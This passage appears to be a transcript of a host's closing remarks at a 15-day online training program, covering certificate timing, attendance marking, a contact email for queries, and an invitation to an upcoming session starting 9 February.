certificate link or any specific date, there will be no any specific date. We will issue within 10 to 15 days. Yeah, the attendance link has been shared once again on chat. Kindly mark your attendance. Okay, I hope you all are cleared about the certificate. And if you have any query, issue, or anything you wanted to know, you can just drop a mail to edl@xlr.com. We have a specific mail ID, that is edl@xlr.com. Anything you wanted to know about the XLR, or if you're facing any issues, you can drop a mail to edl@xlr.com. Okay, fine. So we will wind up for the day. Like if you are interested, I request please join our next upcoming SDP session, which is starting from 9th February. You all can join and earn the knowledge. You can't check the attendance mark. Okay, thank you all. Thank you for joining. Good night. Thank you so much for attending all this 15 days of program. Thank you, everyone.